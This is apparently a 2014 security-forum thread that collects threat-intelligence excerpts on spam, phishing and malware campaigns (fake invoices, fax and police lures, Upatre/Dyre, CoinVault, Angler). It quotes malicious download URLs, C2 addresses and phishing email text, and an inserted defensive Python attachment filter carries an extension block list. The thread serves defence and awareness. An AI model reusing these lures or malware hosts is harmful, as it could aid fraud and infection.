Nov 11, 2014 - "ZeuS/ZBOT has been one of the most talked about malware families for several years, and with good reason... It is estimated that ZBOT has enabled cybercriminals to steal more than $100 million US dollars since its inception... the Commercial Crime Bureau of Hong Kong Police Force estimates this kind of fraud has netted attackers up to $75 million US dollars in the first half of this year, from Hong Kong alone... cybercriminals in a single city, within six months, equaled all the losses from ZBOT up to the present. Unlike Zeus, Predator Pain and Limitless are relatively simple keyloggers. They indiscriminately steal web credentials and mail client credentials, as well as capturing keystrokes and screen captures. The output is human readable... clever targeting, patience, cunning and simple keyloggers have netted these cybercriminals large sums of money. These highlight that cybercrime activities are dependent not only on the sophistication of the tools used, but on how well organized the entire scheme is... The following graphs show the distribution of the victims that we observed, both by country and by industry:
Predator Pain/Limitless Victims by Country:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Country-Distribution-01.jpg
Predator Pain/Limitless Victims by Industry:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/11/Industry-Distribution-01.jpg

- http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cybercrime-to-cyberspying-limitless-keylogger-and-predator-pain/
"... The cybercriminals instead went after SMBs (small and medium-sized businesses), which led us to realize how vulnerable they are to the threat..."

:mad: :fear:

AplusWebMaster
2014-11-12, 16:01
FYI...

Fake 'Police' SPAM ...
- http://blog.dynamoo.com/2014/11/exchange-house-fraud-police-headquaters.html
12 Nov 2014 - "I got a lot of these yesterday..

From: omaniex@ investigtion .com
Subject: Exchange House Fraud (Police Headquaters)
please note that your attension is needed in our station, as we got information on this fraud information as transactions detailed in attachment. kindly acknowledge this letter and report to our office as all report and contact details are in attachment. failure to this you will be held responsible.
Note: come along with your report as it will be needed
regards,
Police headquarters.
Investigtion dept.

Attached is a file EXCH DETAILS PR 7777709.zip which contains two files:
7 TRANSACTION RPPP 00000123-PDF.jar
PR0JECT INVESTIGATI 011111-PDF.jar
... malicious application written in Java (top tip - if you have Java installed on your computer, remove it. You probably -don't- need it). It has a VirusTotal detection rate of 7/55*..."
* https://www.virustotal.com/en/file/bd15776998194aa3a1be49a9eeb982fcb69cf57c76cd7319e1553b929b4f6349/analysis/1415792881/
___

ADP Past Due Invoice Spam
- http://threattrack.tumblr.com/post/102455898273/adp-past-due-invoice-spam
Nov 12, 2014 - "Subjects Seen:
ADP Past Due Invoice#54495150
Typical e-mail details:
Your ADP past due invoice is ready for your review at ADP Online Invoice Management .
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Review your ADP past due invoice here.
Important: Please do not respond to this message. It comes from an unattended mailbox.

Malicious URLs:
kurdogluhotels .com/docfiles/invoice_1211.php
kevalee .ac.th/docfiles/invoice_1211.php
Malicious File Name and MD5:
invoice1211_pdf27.zip (05FC7646CF11B6E7FB124782DAF9FB53)
invoice1211_pdf.exe (78CF05FAA79B41B4BE4666E3496D1D54)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/4eb2bf63ec6433cda6fde59dcbf32fc9/tumblr_inline_nexql2Bx451r6pupn.png

Tagged: ADP, Upatre

- http://blog.dynamoo.com/2014/11/adp-past-due-invoice39911564-spam.html
12 Nov 2014
... Recommended blocklist:
188.165.206.208
shahlart .com
mboaqpweuhs .com "

- http://www.threattracksecurity.com/it-blog/adp-past-due-invoice-spam/
Nov 13, 2014 - "... the Upatre Trojan, which in turn downloaded and decrypted the banking-credential-stealing Trojan Dyre..."
Screenshot: http://www.threattracksecurity.com/it-blog/wp-content/uploads/2014/11/ADP-Past-Due-Invoice.png

94.23.49.77: https://www.virustotal.com/en/ip-address/94.23.49.77/information/

:mad: :fear:
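Added example, not code from dynamoo, ThreatTrack or any of the quoted posts: a gateway-side attachment triage routine in Python for the attachment types that run through the posts above, i.e. the plain .doc files carrying a VBA project (the Sue Morckage, Kate Williams and Finchley invoice runs), the "Police" zip carrying .jar droppers with a -PDF lure in the name, and the ADP invoice1211_pdf27.zip with invoice1211_pdf.exe inside. It refuses executable and macro-enabled extensions (.docm and friends) outright, catches document-looking names in front of a different real extension, looks one level into zips, and quarantines Office documents that carry a VBA project (a vbaProject.bin part in OOXML, a _VBA_PROJECT stream in OLE .doc/.xls). The extension list and the verdict levels are assumptions about a typical mail policy; the sample files are constructed stubs, not the real attachments.

```python
import io
import re
import zipfile

# Extensions refused outright at the gateway. The samples in these posts arrived as
# .exe (Upatre), .jar (Java dropper) and .doc/.docm (Word macro); the rest of the set
# is an assumption about a typical mail policy, not something the posts state.
BLOCKED_EXTENSIONS = {"exe", "scr", "pif", "com", "cpl", "jar", "js", "vbs",
                      "docm", "dotm", "xlsm", "xltm", "pptm"}

# Names built to look like a document: "invoice1211_pdf.exe", "... 011111-PDF.jar".
# The token before the real extension is the lure; the real extension is what runs.
DOUBLE_EXT_RE = re.compile(r"[-_.](pdf|doc|docx|xls|xlsx|txt)\.[a-z0-9]{2,4}$", re.IGNORECASE)

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"      # legacy .doc/.xls container
VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")        # OLE directory entry names are UTF-16LE


def extension(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def has_vba_ooxml(data):
    """OOXML (docm/xlsm/pptm, or a macro document renamed .docx) keeps the macro
    project in a vbaProject.bin part; any such part means macros are present."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def has_vba_ole(data):
    """Binary Office files are OLE2 compound files; a VBA project shows up as a
    directory entry named _VBA_PROJECT. A byte search needs no parser and still
    fires on the plain .doc attachments used in the invoice runs."""
    return data.startswith(OLE_MAGIC) and VBA_MARKER in data


def triage(filename, data, depth=0):
    """Return (verdict, reason); verdict is 'block', 'quarantine' or 'allow'."""
    ext = extension(filename)
    if ext in BLOCKED_EXTENSIONS:
        return "block", f".{ext} attachments are not accepted"
    if DOUBLE_EXT_RE.search(filename):
        return "block", "document-style name in front of a different real extension"
    if data.startswith(b"MZ"):
        return "block", "PE executable content (MZ header), whatever the name says"
    if ext == "zip":
        if depth > 0:
            return "quarantine", "nested archive"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                for member in z.infolist():
                    verdict, reason = triage(member.filename, z.read(member), depth + 1)
                    if verdict != "allow":
                        return "block", f"archive member {member.filename}: {reason}"
        except (zipfile.BadZipFile, RuntimeError):   # corrupt, or password-protected
            return "quarantine", "unreadable (corrupt or encrypted) archive"
        return "allow", "archive with no flagged members"
    if has_vba_ooxml(data) or has_vba_ole(data):
        return "quarantine", "Office document carries a VBA macro project"
    return "allow", "no policy hit"


# --- constructed samples (stubs, not real malware) ----------------------------
def make_ooxml(with_macro):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", OLE_MAGIC + b"\x00" * 16)
    return buf.getvalue()


def make_ole(with_macro):
    body = OLE_MAGIC + b"\x00" * 504                  # header-sized stub only
    return body + (VBA_MARKER if with_macro else b"")


def make_zip(members):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in members.items():
            z.writestr(name, content)
    return buf.getvalue()


SAMPLES = {
    "invoice_6330089.doc": make_ole(True),
    "00000293.docm": make_ooxml(True),
    "invoice1211_pdf27.zip": make_zip({"invoice1211_pdf.exe": b"MZ\x90\x00stub"}),
    "EXCH DETAILS PR 7777709.zip": make_zip({"7 TRANSACTION RPPP 00000123-PDF.jar": b"PK\x03\x04stub"}),
    "Paying_in_sheet.docx": make_ooxml(False),
    "notes.txt": b"plain text",
}


def run_samples():
    return {name: triage(name, data)[0] for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        verdict, reason = triage(name, data)
        print(f"{verdict:10} {name:32} {reason}")
```

Run it as a script to see the verdicts, or call triage() from whatever hook your gateway exposes for attachment inspection. The content checks matter more than the extension list: a .doc with a VBA project is quarantined even though .doc itself is allowed, and an MZ header is blocked whatever the name says, which is the case the spoofed-icon executables in the earlier posts rely on. Pair this with "show known file extensions" on the desktop so users can see the real extension too.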

AplusWebMaster
2014-11-13, 17:52
FYI...

Fake 'BankLine' SPAM - targets RBS customers
- http://blog.mxlab.eu/2014/11/13/fake-email-regarding-new-secure-message-from-bankline-that-targets-rbs-customers/
Nov 13, 2014 - "... intercepted -fake- emails regarding a new secure message from BankLine that targets RBS customers. The subject line is “You have received a new secure message from BankLine#24802254″ this email is sent from the spoofed address “Bankline <secure.message @ bankline .com>” and has the following body:
You have received a secure message.
Read your secure message by following the link bellow:
link-
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk at 0131 556 1196.
First time users – will need to register after opening the attachment...

The embedded URL in our sample leads to hxxp ://vsrwhitefish .com/bankline/message.php. This opens an HTML document with an embedded JavaScript that uses ActiveXObject or a regular HTTP request to start a download, so that the malicious file is opened and/or saved as instructed."

216.251.43.98: https://www.virustotal.com/en/ip-address/216.251.43.98/information/
... 5/60 2014-11-13 13:23:41 http ://vsrwhitefish .com/bankline/message.php
___

Fake 'Voice mail' SPAM ...
- http://blog.mxlab.eu/2014/11/13/voice-message-emails-contains-security-threat/
Nov 13, 2014 - "... intercepted a large campaign by email with the subject “Voice Message #0768384921 (numbers may vary)” and is continuation of the previous campaign targeting RBS customers. This email is sent from the spoofed address “Message Admin <martin.smith@ essex .org.uk>” and has the following body:

Voice redirected message
hxxp ://crcmich .org/bankline/message.php
Sent: Thu, 13 Nov 2014 11:54:24 +0000

The embedded URL in our sample leads to hxxp ://crcmich .org/bankline/message.php. This opens an HTML document with an embedded JavaScript that uses ActiveXObject or a regular HTTP request to start a download, so that the malicious file is opened and/or saved as instructed."

69.160.53.51: https://www.virustotal.com/en/ip-address/69.160.53.51/information/
... 3/61 2014-11-13 15:04:47 http ://crcmich .org/bankline/message.php?
___

Alert (TA14-317A)
Apple iOS "Masque Attack" Technique
- https://www.us-cert.gov/ncas/alerts/TA14-317A
Nov 13, 2014
Systems Affected:
iOS devices running iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta.
Overview:
A technique labeled “Masque Attack” allows an attacker to substitute malware for a legitimate iOS app under a limited set of circumstances...
(More detail at the URL above.)

:mad: :fear:

AplusWebMaster
2014-11-14, 16:35
FYI...

Fake 'Amazon frozen account' – Phish ...
- http://myonlinesecurity.co.uk/amazon-account-frozen-temporarily-phishing/
14 Nov 2014 - "'Your account has been frozen temporarily' pretending to come from Amazon <auto-confirm@ amazon .co.uk> is one of the latest -phish- attempts to steal your Amazon Account and your Bank, credit card and personal details. This one only wants your personal details, Amazon log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_phishing-email.png
If you open the -attached- html file you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_login.png
When you fill in your user name and password you get a page looking like this, where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format. After submitting the information you get -bounced- on to the genuine Amazon .co.uk website:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/amazon_account_verification.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___

CoinVault - new ransomware
- http://www.webroot.com/blog/2014/11/14/coinvault/
Nov 14, 2014 - "Today we encountered a new type of encrypting ransomware that looks to be of the cryptographic locker family. It employs the same method of encryption and has a very similar GUI (kills VSS, increases required payment every 24hr, uses bitcoin payment, etc.).
CoinVault GUI:
> https://i.imgur.com/ADEO21U.png
Here is the background* that it creates – also very similar.
* https://i.imgur.com/LAHkjT8.png
... this is the first Encrypting Ransomware that I’ve seen which actually gives you a free decrypt. It will let you pick any single file that you need after encryption and will decrypt it for you.
> http://i.imgur.com/F3enAqN.png
... it gives a good insight into what the actual decryption routine is like if you find yourself actually having to pay them. I suspect that this freebie will increase the number of people who will pay..."

- http://arstechnica.com/security/2014/11/new-cryptoware-title-borrows-page-from-drug-dealers/
Nov 14 2014
___

Flash Player updated ...
- https://blog.malwarebytes.org/online-security/2014/11/18-vulnerabilities-fixed-update-your-flash-player/
Nov 14, 2014 - "Adobe has fixed -18- vulnerabilities in their Flash Player, and you should update immediately, if you haven’t already done so. However, please ensure you’re installing / updating from the right place. For example:
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd1.jpg
The above site claims:
It is recommended that you update Flash to the latest version to view this page. Please update to continue. Your Flash Plugin version is too low, causing the current sites and related softwares can not be opened properly, please update your Flash Plugin now!
The site -forwards- visitors to a sign-up page offering a “Mac cleaning” tool... confusing for anybody expecting Adobe Flash updates.
> https://blog.malwarebytes.org/wp-content/uploads/2014/11/adobupd2.jpg
The Adobe Flash Player website is the place to go for Flash installs*... Always cast a critical eye at the URL of any “Flash Player” site you happen to be on, and check the small print in case you end up with more than you bargained for. Fake Flash Player websites have been around for many years, and are often a prime source of unwanted PUP installs and the occasional slice of Malware..."
* http://get.adobe.com/flashplayer/ ... (Uncheck the 'McAfee' option if you choose not to use it...)

:fear::fear: :mad:

AplusWebMaster
2014-11-17, 15:07
FYI...

Fake Fax SPAM - malicious .DOCM attachment
- http://blog.dynamoo.com/2014/11/interfax-failed-fax-transmission-spam.html
17 Nov 2014 - "This -fake- fax spam comes with a malicious attachment
From: Interfax [uk@ interfax .net]
Date: 13 November 2014 20:29
Subject: Failed Fax Transmission to 01616133969@fax.tc<00441616133969>
Transmission Results
Destination Fax: 00441616133969
Contact Name: 01616133969@ fax .tc
Start Time: 2014/11/13 20:05:27
End Time: 2014/11/13 20:29:00
Transmission Result: 3220 - Communication error
Pages sent: 0
Subject: 140186561.XLS
CSID:
Duration (In Seconds): 103
Message ID: 485646629
Thank you for using Interfax ...

Attached is a malicious Word macro file called 00000293.docm which is currently undetected at VirusTotal*... Inside this .DOCM file is a malicious macro... which attempts to download a malicious binary from http ://agro2000 .cba .pl/js/bin.exe . This file is downloaded to %TEMP%\MRSWZZFEYPX.exe and the binary also has zero detections at VirusTotal**, and the Malwr report shows that it tries to connect to the following URL: http ://84.40.9.34 /lneinn/mo%26af.lipgs%2Bfn%7El%3Fboel%3D%3F+%3Fa%20%3F~pigc_k/ci$slf%2B%20l%3D%7E . It then drops a malicious DLL onto the target system which has a rather better detection rate of 12/53***. If you are a corporate email administrator then you might consider blocking .DOCM files at the perimeter as I can see no valid reason for these to be sent by email. You should definitely block 84.40.9.34 (Hostway, Belgium) as this is a known bad server that has been used in several recent attacks."
* https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416221806/

** https://www.virustotal.com/en/file/8307c13583837bcfc30e8c267133f33e3fff4d86abd59adcb7f1fb7dd04a0d54/analysis/1416222127/

*** https://www.virustotal.com/en/file/1a774212d3f20523c4ddd63dd657954eeb7bf97c19ce9a9838b5297239c0119b/analysis/1416222797/

84.40.9.34: https://www.virustotal.com/en/ip-address/84.40.9.34/information/

- http://myonlinesecurity.co.uk/failed-fax-transmission-01616133969fax-tc-word-doc-malware/
17 Nov 2014
> https://www.virustotal.com/en/file/724b6ed9f68ae9e217f1b88a8107f7b3cb95cf8a55ce2fbf0a7c455099f66012/analysis/1416212735/
___

Fake Investment SPAM ...
- http://myonlinesecurity.co.uk/investment-opportunities-ireland-malware/
17 Nov 2014 - "'Investment Opportunities in Ireland' pretending to come from IDA Ireland (Home of Foreign Businesses) <info@idaireland.com> with a link to a malicious zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/Investment-Opportunities-in-Ireland.png

Today's Date: investmentareas.rar: Extracts to: investmentareas.scr
Current Virus total detections: 26/55* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b05b065ab2fbb6db6c29fd0a6ad856bca0fafe46322d91890dc1755788ea6e7b/analysis/1416215003/
___

Fake 'Payment Declined' Phish ...
- http://myonlinesecurity.co.uk/bt-account-payment-declined-phishing/
17 Nov 2014 - "Any phishing attempt wants to get as much personal and financial information from you as possible. This 'BT Account- Payment Declined' pretending to come from BT .com <noreplymail@ btc .com> phishing scam is one of them. The phishers try to use well known companies or Government departments like British Telecom, HMRC, Inland Revenue, Virgin Media, British Gas or any company that many people are likely to have an account with. This one wants your personal details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/BT-Account-Payment-Declined.png

The link in the email leads you to a webpage looking like:
Screenshot2: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-log-in.png

That leads on to a page to enter all your details, including bank account, credit card, mother’s maiden name and everything else necessary to steal your identity and clean out your bank and credit card accounts:
Screenshot3: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details.png

Then you get a success page, where they kindly inform you that “The Anti Fraud System has been succesfully added to your account” and then are bounced to the real BT site:
Screenshot4: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/BT-billing-fake-details-success-.png

All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
___

Fake 'Test message' SPAM plague continues..
- http://blog.dynamoo.com/2014/11/test-message-spam-plague-continues.html
17 Nov 2014 - "This plague of spam "test messages" has been going on for two days now, probably sourced from "Botnet 125"* which sends most of the spam I get. These messages are annoying but not harmful in themselves, I suspect they are probing mail servers for responses. If you have a catch-all email address then you will probably see a lot of these. The targets are either completely random or have been harvested from one data breach or another as far as I can see.
From: Hollie <Laurie.17@ 123goa .com>
Date: 17 November 2014 19:04
Subject: Test 8657443T
test message.
Murphy became a free agent on October 15, after refusing a minor league assignment. Silva implies the last cycle has begun, believing herself to be the host.
Icelandic had been heard. American CIA contract air crews and pilots from the Alabama Air Guard... ..."
* http://www.proofpoint.com/threatinsight/posts/dueling-dridex-campaigns-target-banking-customers.php

:mad: :fear:

AplusWebMaster
2014-11-18, 13:16
FYI...

Fake Invoice SPAM - Word doc malware attached
- http://myonlinesecurity.co.uk/email-contains-invoice-file-attachment-invoice-1633370-may-word-doc-malware/
18 May 2014 - "'Invoice #1633370 May' with a malicious word doc attachment saying 'This email contains an invoice file attachment' is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

This email contains an invoice file attachment

So far today, I have seen 3 different size files attached to this email; all file names are random:
18 November 2014 : invoice_796732903.doc (59kb) Current Virus total detections: 1/55*

18 November 2014 : invoice_1952581.doc (41kb) Current Virus total detections: 1/55**

18 November 2014 : invoice_80943810.doc (22kb) Current Virus total detections: 0/54***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0a78296121f16e13812c609c2d55245a492b6a992c99b403b2427e41acae9e72/analysis/1416303264/

** https://www.virustotal.com/en/file/70411393ea66130204abfb3653646dcb495538fbbc6a5a76bef1376625d2fcbf/analysis/1416304606/

*** https://www.virustotal.com/en/file/670011a08ddcde9d1892593a968f87e9e8800248f6bb9b8967b05ec4c34b64d0/analysis/1416304325/
___

Another Fake FAX SPAM run ...
- http://blog.dynamoo.com/2014/11/incoming-fax-report-spam-lets-party.html
18 Nov 2014 - "... 'need to load some more papyrus into the facsimile machine...:
From: Incoming Fax [no-reply@ efax .co.uk]
Date: 18 November 2014 13:16
Subject: INCOMING FAX REPORT : Remote ID: 766-868-5553
INCOMING FAX REPORT
Date/Time: Tue, 18 Nov 2014 14:16:58 +0100
Speed: 4222bps
Connection time: 01:09
Pages: 5
Resolution: Normal
Remote ID: 963-864-5728
Line number: 1
DTMF/DID:
Description: Internal report
We have uploaded fax report on dropbox, please use the following link to download your file...

This is (of course) utter bollocks, and the link in the email downloads a ZIP file document_8731_pdf.zip which in turn contains a malicious executable document_8731_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the Malwr report it makes these following HTTP requests:
http ://108.61.229.224:13861 /1811us1/HOME/0/51-SP3/0/
http ://108.61.229.224:13861 /1811us1/HOME/1/0/0/
http ://159593.webhosting58 .1blu. de/mandoc/narutus1.pmg
It also drops a file EXE1.EXE onto the target system which has a detection rate of 7/55**...
Recommended blocklist:
108.61.229.224
159593.webhosting58 .1blu .de "
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416318405/
... Behavioural information
TCP connections
108.61.229.224: https://www.virustotal.com/en/ip-address/108.61.229.224/information/
178.254.0.111: https://www.virustotal.com/en/ip-address/178.254.0.111/information/

** https://www.virustotal.com/en/file/5ec1e1850100849dd4750ef083824806304e82be5233e241b69b1960acc96324/analysis/1416318784/

- http://myonlinesecurity.co.uk/incoming-fax-report-remote-id-999-745-5477-fake-pdf-malware/
18 Nov 2014
- https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/
___

Fake Voice msg SPAM again - PDF malware
- http://myonlinesecurity.co.uk/voice-message-685-869-9737-mailbox-226-fake-pdf-malware/
18 Nov 2014 - "'voice message from 685-869-9737 for mailbox 226' pretending to come from 'Voice Mail <voicemail_sender@ voicemail .com>' is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer... The email looks like:
You have received a voice mail message from 685-869-9737
Message length is 00:00:30. Message size is 225 KB.
Download your voicemail message from dropbox service below (Google Disk Drive Inc.)...

18 November 2014: document_8731_pdf.zip (12 kb): Extracts to: document_8731_pdf.exe
Current Virus total detections: 4/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/d567e8853aa3cbccbd5082471f761f75d77daf68c8d448e88875f141d6d0ab6f/analysis/1416321619/

:fear: :mad:

AplusWebMaster
2014-11-19, 16:24
FYI...

Fake Bank phish ...
- http://myonlinesecurity.co.uk/lloyds-bank-improving-current-account-phishing/
19 Nov 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like :
-We’re improving your current account
-There have been unauthorised or suspicious attempts to log in to your account, please verify
-Your account has exceeded its limit and needs to be verified
-Your account will be suspended !
-You have received a secure message from < your bank>
-New Secure Message
-We are unable to verify your account information
-Update Personal Information
-Urgent Account Review Notification
-We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
-Confirmation of Order

This one is Lloyds bank 'We’re improving your current account' pretending to come from Lloyds Banking Group Plc <info@ emails.very .co.uk> The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever fill in the html (webpage) form that comes attached to the email. Some versions of this phish will have a link to a website that looks at first glance like the genuine bank website. Lloyds actually -do- allow you to pay in and perform some transactions at a Post Office rather than going to your branch, so many users might get unwittingly caught out by this one and think they need to notify the bank.
Email looks like:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/lloyds-We-are-improving-your-current-account.png

This one wants your personal details and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details... whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. If it says .EXE then it is a problem and should -not- be run or opened."
___

Azure cloud outages - MSN web portal offline
- http://www.reuters.com/article/2014/11/19/us-microsoft-web-idUSKCN0J309E20141119
Nov 18, 2014 11:53pm EST - "Microsoft Corp's Azure cloud-computing service, which hosts websites and lets customers store and manage data remotely, suffered serious outages on Tuesday taking its popular MSN web portal offline. According to Microsoft's Azure status page*, the problems started around 5pm Pacific time and have still not been fully solved..."
* http://azure.microsoft.com/en-us/status/#history

>> http://azure.microsoft.com/blog/2014/11/19/update-on-azure-storage-service-interruption/
Nov 19, 2014

:fear::fear: :mad:

AplusWebMaster
2014-11-20, 18:01
FYI...

Angler Exploit Kit adds New Flash Exploit...
- http://threatpost.com/angler-exploit-kit-adds-new-flash-exploit-for-cve-2014-8440/109498
Nov 20, 2014 - "... Angler is just one of the many such exploit kits available to attackers, but the creators of this one seem to be especially quick about adding exploits for new vulnerabilities to the kit. In October, a week after Adobe released its monthly patch update, researchers saw Angler exploiting an integer overflow in Flash that had just been patched. “This is really, really fast,” Kafeine, a French security researcher who identified the attack at the time, said. “The best I remember was maybe three weeks in February 2014.” Now, Kafeine said he already has seen Angler exploiting a Flash vulnerability that was patched Nov. 11 in Adobe’s November update release*. This vulnerability is CVE-2014-8440, a memory corruption flaw in Flash that can allow an attacker to take control of a target system. The bug exists in Flash on multiple platforms, including Windows, OS X and Linux, and Kafeine said it is getting its share of attention from attackers. “The vulnerability is being exploited in blind mass attack. No doubt about it: the team behind Angler is really good at what it does,” he said in a blog post*..."
* http://malware.dontneedcoffee.com/2014/11/cve-2014-8440.html

> https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8440 - 10.0 (HIGH)
Last revised: 11/12/2014

Flash test site: https://www.adobe.com/software/flash/about/
___

Fake Donation Overpayment SCAM
- https://www.ic3.gov/media/2014/141120.aspx
Nov 20, 2014 - "... received numerous complaints from businesses, charitable organizations, schools, universities, health related organizations, and non-profit organizations, reporting an online donation scheme. The complaints reported subjects who had donated thousands of dollars, via stolen credit cards. Once donations were made, the subjects immediately requested the majority of the donation back, but credited to a different card. They claimed to have mistakenly donated too much by adding an extra digit to the dollar amount (i.e., $5000 was ‘accidently’ entered instead of $500). However, very few complainants actually returned the money to the second credit card. Many, through their own investigations, discovered the original card was -stolen- or the credit card company notified them of such. Also, some of the organizations’ policies did not allow funds to be returned to a different credit card."

:fear::fear: :mad:

AplusWebMaster
2014-11-21, 19:59
:mad:FYI...

Something evil on 46.8.14.154
- http://blog.dynamoo.com/2014/11/something-evil-on-46814154.html
21 Nov 2014 - "46.8.14.154 (Netart Group S.r.o. / Movenix International Inc) forms part of an exploit chain that starts with compromised OpenX servers and appears to end up with an exploit kit of some sort... subdomains have been active on that server, they are ALL hijacked GoDaddy domains... (Long list @ the dynamoo URL above) ... The best thing to do is to -block- traffic to 46.8.14.154 because these domains seem to change every few minutes."
___

Fake 'Payment Received' SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/11/duplicate-payment-received-spam-from.html
21 Nov 2014 - "This -fake- financial spam has a malicious Word document attached.
From: Enid Tyson
Date: 21 November 2014 15:36
Subject: INV209473A Duplicate Payment Received
Good afternoon,
I refer to the above invoice for which we received a bacs payment of £675.74 on 10th November 14. Please be advised that we already received payment for this invoice, by bacs on 30th October 2014.
I will therefore arrange a refund, please confirm preferred method, cheque or bacs transfer. If a cheque please confirm the name the cheque should be made out too or if bank transfer, please advise bank details.
If you have any queries regarding this matter, please do not hesitate to contact me.
I look forward to hearing from you .
Many thanks
Enid Tyson
Accounts Department

In this case the attachment is De_209473A.doc but it will probably vary with the subject name, the document itself has zero detections at VirusTotal (the Malwr report is inconclusive). This contains a malicious macro.. which connects to the following URL:
http ://79.137.227.123 :8080/get1/get1.php
...This has a VirusTotal detection rate of just 1/55*. The malware is hardened against analysis in a Sandbox so automated results are inconclusive...
UPDATE: A second version is going the rounds, with zero detections** and a download location of http :// 61.221.117.205 :8080/get1/get1.php ..."
* https://www.virustotal.com/en/file/7beee0920340d5a610f458ce1ebc0575e7854e88e2cbe1bebd8ec6014b778fe5/analysis/1416584784/

** https://www.virustotal.com/en/file/ea85382435cf26e8066780b7115e4beef78caa0e8766bff324ff19e216496e4b/analysis/1416584533/

:fear: :mad:

AplusWebMaster
2014-11-23, 00:05
FYI...

Fake 'Herbal Root' email SCAM
- http://blog.dynamoo.com/2014/11/oplamo-herbal-root-scam.html
22 Nov 2014 - "... there is no such thing as "Oplamo Herbal Root". So, this spam is almost definitely a scam.
From: Mr. Tom Good Hope [mrtomgood@ gmail .com]
Reply-To: mrtomgoodhope@ gmail .com
Date: 22 November 2014 02:24
Subject: SUPPLY BUSINESS OF OPLAMO
My name is Tom Goodhope i based in Liverpool,UK working with a pharmaceutical company.
I have decided to contact you directly to discuss briefly via email about the ongoing supply that came up in our company. I think if you can understand English and India Language (Hindi,Tamil etc) you can take up this business proposal to buy out OPLAMO HERBAL ROOT from the local producer in India and make supply to our company as the direct producer to enable our company be buying direct from you on every subsequent order after this first purchase. OPLAMO ROOT its used for production of Anti-viral drugs & Animal Vaccines.Our company have been purchasing the materials from Pakistan but it is very scarce and expensive now in Pakistan. I've found out the truth that this Pakistan people purchases this product in India at the rate of $210 USD, while they supply to our company at the rate of $430 USD... Upon your reply i will clarify you more on how to start this business immediately, please drop your contact phone number for me to be able to contact you ASAP.
Thanks,
Mr Tom Goodhope
Company Secretary ...

